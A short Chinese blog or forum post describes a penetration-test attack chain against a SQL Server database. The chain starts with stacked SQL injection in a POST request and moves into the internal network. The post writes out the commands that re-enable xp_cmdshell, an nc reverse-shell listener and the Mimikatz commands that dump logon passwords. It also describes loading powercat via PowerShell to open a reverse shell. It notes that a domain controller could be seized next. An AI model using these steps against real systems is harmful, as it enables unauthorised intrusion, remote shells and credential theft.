堆叠注入到内网(日常水文)

前提:POST包存在注入,注入类型:堆叠注入;权限:很高,数据库,sqlserver
 
遇到堆叠注入,第一想到是否可以执行xp_cmdshell;
发现该系统未开启xp_cmdshell,尝试开启:开启xp_cmdshell
EXEC sp_configure ‘show advanced options’,1;
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;
RECONFIGURE;

1.jpg

尝试ping dnslog,成功执行命令:
2.png

3.png

nc监听:nc -lvnp 4999
4.png

利用xp_cmdshell,调用powershell,远程加载powercat并反弹回来到cmd上
5.png

6.png

mimikatz抓取密码
Mimikatz#       privilege::debug
Mimikatz#       sekurlsa::logonpasswords 
7.png

查看进程中存在域控的进程,如果直接进程注入,可以直接拿下域控权限,由于涉及内网渗透,暂不进一步进行渗透。
 
 

0 个评论

要回复文章请先登录注册